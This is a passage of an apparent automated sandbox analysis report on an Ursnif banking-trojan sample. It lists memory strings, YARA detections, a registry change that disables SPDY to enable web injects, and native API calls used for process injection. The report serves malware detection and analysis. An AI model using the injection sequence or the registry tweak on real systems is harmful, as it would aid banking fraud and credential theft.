Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml4.13.dr String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml5.13.dr String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml6.13.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml7.13.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml8.13.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.568586726.0000000005F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492017144.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.579706123.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491990075.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492004462.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498916612.000000000591B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.574197225.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491965046.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491881653.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.579141799.000001B576620000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491855597.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 632, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.568586726.0000000005F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492017144.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.579706123.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491990075.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492004462.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498916612.000000000591B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.574197225.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491965046.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491881653.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.579141799.000001B576620000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491855597.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 632, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Contains functionality to call native functions
Source: C:\Windows\explorer.exe Code function: 29_2_04CE4674 NtQuerySystemInformation, 29_2_04CE4674
Source: C:\Windows\explorer.exe Code function: 29_2_04CE33F8 NtQueryInformationProcess, 29_2_04CE33F8
Source: C:\Windows\System32\control.exe Code function: 30_2_004E68E0 NtReadVirtualMemory, 30_2_004E68E0
Source: C:\Windows\System32\control.exe Code function: 30_2_004F70B8 NtMapViewOfSection, 30_2_004F70B8
Source: C:\Windows\System32\control.exe Code function: 30_2_004F1154 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification, 30_2_004F1154
Source: C:\Windows\System32\control.exe Code function: 30_2_005029D0 NtAllocateVirtualMemory, 30_2_005029D0
Source: C:\Windows\System32\control.exe Code function: 30_2_004EC188 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 30_2_004EC188
Source: C:\Windows\System32\control.exe Code function: 30_2_004F9B08 NtCreateSection, 30_2_004F9B08
Source: C:\Windows\System32\control.exe Code function: 30_2_004E33F8 NtQueryInformationProcess, 30_2_004E33F8
Source: C:\Windows\System32\control.exe Code function: 30_2_004E2CC0 NtQueryInformationProcess, 30_2_004E2CC0
Source: C:\Windows\System32\control.exe Code function: 30_2_004E7F44 NtWriteVirtualMemory, 30_2_004E7F44
Source: C:\Windows\System32\control.exe Code function: 30_2_004F6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 30_2_004F6F64
Source: C:\Windows\System32\control.exe Code function: 30_2_00521003 NtProtectVirtualMemory,NtProtectVirtualMemory, 30_2_00521003
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 32_2_000001B5767B6F64
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A33F8 NtQueryInformationProcess, 32_2_000001B5767A33F8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767E1003 NtProtectVirtualMemory,NtProtectVirtualMemory, 32_2_000001B5767E1003
Detected potential crypto function
Source: C:\Windows\explorer.exe Code function: 29_2_04D0FD7C 29_2_04D0FD7C
Source: C:\Windows\explorer.exe Code function: 29_2_04CE4734 29_2_04CE4734
Source: C:\Windows\explorer.exe Code function: 29_2_04CE3908 29_2_04CE3908
Source: C:\Windows\explorer.exe Code function: 29_2_04CE7CCC 29_2_04CE7CCC
Source: C:\Windows\explorer.exe Code function: 29_2_04CE34A0 29_2_04CE34A0
Source: C:\Windows\explorer.exe Code function: 29_2_04CEBC1C 29_2_04CEBC1C
Source: C:\Windows\explorer.exe Code function: 29_2_04CF7434 29_2_04CF7434
Source: C:\Windows\explorer.exe Code function: 29_2_04CE3D81 29_2_04CE3D81
Source: C:\Windows\explorer.exe Code function: 29_2_04CFEDA0 29_2_04CFEDA0
Source: C:\Windows\explorer.exe Code function: 29_2_04CEB55C 29_2_04CEB55C
Source: C:\Windows\explorer.exe Code function: 29_2_04CF7D60 29_2_04CF7D60
Source: C:\Windows\explorer.exe Code function: 29_2_04CE4578 29_2_04CE4578
Source: C:\Windows\explorer.exe Code function: 29_2_04D0AD28 29_2_04D0AD28
Source: C:\Windows\explorer.exe Code function: 29_2_04CFAE80 29_2_04CFAE80
Source: C:\Windows\explorer.exe Code function: 29_2_04D02E04 29_2_04D02E04
Source: C:\Windows\explorer.exe Code function: 29_2_04CE5628 29_2_04CE5628
Source: C:\Windows\explorer.exe Code function: 29_2_04CE8FC8 29_2_04CE8FC8
Source: C:\Windows\explorer.exe Code function: 29_2_04CF9FD0 29_2_04CF9FD0
Source: C:\Windows\explorer.exe Code function: 29_2_04D0DFF8 29_2_04D0DFF8
Source: C:\Windows\explorer.exe Code function: 29_2_04CF07AC 29_2_04CF07AC
Source: C:\Windows\explorer.exe Code function: 29_2_04CEAF44 29_2_04CEAF44
Source: C:\Windows\explorer.exe Code function: 29_2_04D01F74 29_2_04D01F74
Source: C:\Windows\explorer.exe Code function: 29_2_04CE9F7C 29_2_04CE9F7C
Source: C:\Windows\explorer.exe Code function: 29_2_04D0D72C 29_2_04D0D72C
Source: C:\Windows\explorer.exe Code function: 29_2_04D0B0F8 29_2_04D0B0F8
Source: C:\Windows\explorer.exe Code function: 29_2_04D0F8E8 29_2_04D0F8E8
Source: C:\Windows\explorer.exe Code function: 29_2_04D08844 29_2_04D08844
Source: C:\Windows\explorer.exe Code function: 29_2_04CE207C 29_2_04CE207C
Source: C:\Windows\explorer.exe Code function: 29_2_04CE8824 29_2_04CE8824
Source: C:\Windows\explorer.exe Code function: 29_2_04D059F8 29_2_04D059F8
Source: C:\Windows\explorer.exe Code function: 29_2_04CEC188 29_2_04CEC188
Source: C:\Windows\explorer.exe Code function: 29_2_04D0610C 29_2_04D0610C
Source: C:\Windows\explorer.exe Code function: 29_2_04CEA2EC 29_2_04CEA2EC
Source: C:\Windows\explorer.exe Code function: 29_2_04D082E0 29_2_04D082E0
Source: C:\Windows\explorer.exe Code function: 29_2_04CF6A74 29_2_04CF6A74
Source: C:\Windows\explorer.exe Code function: 29_2_04D0D26C 29_2_04D0D26C
Source: C:\Windows\explorer.exe Code function: 29_2_04CFCA04 29_2_04CFCA04
Source: C:\Windows\explorer.exe Code function: 29_2_04CF021C 29_2_04CF021C
Source: C:\Windows\explorer.exe Code function: 29_2_04CEEBAC 29_2_04CEEBAC
Source: C:\Windows\explorer.exe Code function: 29_2_04CF0BB0 29_2_04CF0BB0
Source: C:\Windows\explorer.exe Code function: 29_2_04D00354 29_2_04D00354
Source: C:\Windows\explorer.exe Code function: 29_2_04CFE35C 29_2_04CFE35C
Source: C:\Windows\explorer.exe Code function: 29_2_04D09344 29_2_04D09344
Source: C:\Windows\explorer.exe Code function: 29_2_04CE7B14 29_2_04CE7B14
Source: C:\Windows\explorer.exe Code function: 29_2_04CFC324 29_2_04CFC324
Source: C:\Windows\System32\control.exe Code function: 30_2_004EC188 30_2_004EC188
Source: C:\Windows\System32\control.exe Code function: 30_2_004FAE80 30_2_004FAE80
Source: C:\Windows\System32\control.exe Code function: 30_2_004F2F90 30_2_004F2F90
Source: C:\Windows\System32\control.exe Code function: 30_2_00508844 30_2_00508844
Source: C:\Windows\System32\control.exe Code function: 30_2_004E207C 30_2_004E207C
Source: C:\Windows\System32\control.exe Code function: 30_2_004E8824 30_2_004E8824
Source: C:\Windows\System32\control.exe Code function: 30_2_0050B0F8 30_2_0050B0F8
Source: C:\Windows\System32\control.exe Code function: 30_2_0050F8E8 30_2_0050F8E8
Source: C:\Windows\System32\control.exe Code function: 30_2_004E3908 30_2_004E3908
Source: C:\Windows\System32\control.exe Code function: 30_2_0050610C 30_2_0050610C
Source: C:\Windows\System32\control.exe Code function: 30_2_005059F8 30_2_005059F8
Source: C:\Windows\System32\control.exe Code function: 30_2_004F6A74 30_2_004F6A74
Source: C:\Windows\System32\control.exe Code function: 30_2_0050D26C 30_2_0050D26C
Source: C:\Windows\System32\control.exe Code function: 30_2_004FCA04 30_2_004FCA04
Source: C:\Windows\System32\control.exe Code function: 30_2_004F021C 30_2_004F021C
Source: C:\Windows\System32\control.exe Code function: 30_2_004EA2EC 30_2_004EA2EC
Source: C:\Windows\System32\control.exe Code function: 30_2_005082E0 30_2_005082E0
Source: C:\Windows\System32\control.exe Code function: 30_2_00500354 30_2_00500354
Source: C:\Windows\System32\control.exe Code function: 30_2_004FE35C 30_2_004FE35C
Source: C:\Windows\System32\control.exe Code function: 30_2_00509344 30_2_00509344
Source: C:\Windows\System32\control.exe Code function: 30_2_004E7B14 30_2_004E7B14
Source: C:\Windows\System32\control.exe Code function: 30_2_004FC324 30_2_004FC324
Source: C:\Windows\System32\control.exe Code function: 30_2_004F0BB0 30_2_004F0BB0
Source: C:\Windows\System32\control.exe Code function: 30_2_004EBC1C 30_2_004EBC1C
Source: C:\Windows\System32\control.exe Code function: 30_2_004F7434 30_2_004F7434
Source: C:\Windows\System32\control.exe Code function: 30_2_004E7CCC 30_2_004E7CCC
Source: C:\Windows\System32\control.exe Code function: 30_2_004E34A0 30_2_004E34A0
Source: C:\Windows\System32\control.exe Code function: 30_2_004EB55C 30_2_004EB55C
Source: C:\Windows\System32\control.exe Code function: 30_2_0050FD7C 30_2_0050FD7C
Source: C:\Windows\System32\control.exe Code function: 30_2_004F7D60 30_2_004F7D60
Source: C:\Windows\System32\control.exe Code function: 30_2_004E4578 30_2_004E4578
Source: C:\Windows\System32\control.exe Code function: 30_2_0050AD28 30_2_0050AD28
Source: C:\Windows\System32\control.exe Code function: 30_2_004E3D81 30_2_004E3D81
Source: C:\Windows\System32\control.exe Code function: 30_2_004FEDA0 30_2_004FEDA0
Source: C:\Windows\System32\control.exe Code function: 30_2_00502E04 30_2_00502E04
Source: C:\Windows\System32\control.exe Code function: 30_2_004E5628 30_2_004E5628
Source: C:\Windows\System32\control.exe Code function: 30_2_004EAF44 30_2_004EAF44
Source: C:\Windows\System32\control.exe Code function: 30_2_00501F74 30_2_00501F74
Source: C:\Windows\System32\control.exe Code function: 30_2_004E9F7C 30_2_004E9F7C
Source: C:\Windows\System32\control.exe Code function: 30_2_004E4734 30_2_004E4734
Source: C:\Windows\System32\control.exe Code function: 30_2_0050D72C 30_2_0050D72C
Source: C:\Windows\System32\control.exe Code function: 30_2_004E8FC8 30_2_004E8FC8
Source: C:\Windows\System32\control.exe Code function: 30_2_004F9FD0 30_2_004F9FD0
Source: C:\Windows\System32\control.exe Code function: 30_2_0050DFF8 30_2_0050DFF8
Source: C:\Windows\System32\control.exe Code function: 30_2_004F07AC 30_2_004F07AC
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B2F90 32_2_000001B5767B2F90
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BAE80 32_2_000001B5767BAE80
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767AC188 32_2_000001B5767AC188
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BCA04 32_2_000001B5767BCA04
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C59F8 32_2_000001B5767C59F8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B6A74 32_2_000001B5767B6A74
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CD26C 32_2_000001B5767CD26C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B021C 32_2_000001B5767B021C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A7B14 32_2_000001B5767A7B14
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767AA2EC 32_2_000001B5767AA2EC
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C82E0 32_2_000001B5767C82E0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A9F7C 32_2_000001B5767A9F7C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C1F74 32_2_000001B5767C1F74
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767AAF44 32_2_000001B5767AAF44
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A4734 32_2_000001B5767A4734
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CD72C 32_2_000001B5767CD72C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CDFF8 32_2_000001B5767CDFF8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B9FD0 32_2_000001B5767B9FD0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A8FC8 32_2_000001B5767A8FC8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B07AC 32_2_000001B5767B07AC
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A207C 32_2_000001B5767A207C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C8844 32_2_000001B5767C8844
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A8824 32_2_000001B5767A8824
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A3908 32_2_000001B5767A3908
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C610C 32_2_000001B5767C610C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CB0F8 32_2_000001B5767CB0F8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CF8E8 32_2_000001B5767CF8E8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A3D81 32_2_000001B5767A3D81
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A4578 32_2_000001B5767A4578
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CFD7C 32_2_000001B5767CFD7C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B7D60 32_2_000001B5767B7D60
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767AB55C 32_2_000001B5767AB55C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CAD28 32_2_000001B5767CAD28
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C2E04 32_2_000001B5767C2E04
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BEDA0 32_2_000001B5767BEDA0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A5628 32_2_000001B5767A5628
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BE35C 32_2_000001B5767BE35C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C0354 32_2_000001B5767C0354
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C9344 32_2_000001B5767C9344
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BC324 32_2_000001B5767BC324
